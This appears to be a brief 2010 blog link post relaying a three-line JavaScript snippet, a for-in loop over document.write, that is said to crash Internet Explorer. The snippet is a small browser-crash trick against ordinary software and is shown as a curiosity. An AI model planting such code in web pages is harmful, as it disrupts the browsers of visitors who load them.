Nov 22 2010

How to Crash IE with JavaScript – Jeff Bail

Published by under link

Link: How to Crash IE with JavaScript – Jeff Bail

How might you do that? Glad you asked. Using JavaScript, it’s dead simple:

for (d in document.write) {
        document.write(d);
}

Comments Off on How to Crash IE with JavaScript – Jeff Bail




Comments are closed at this time.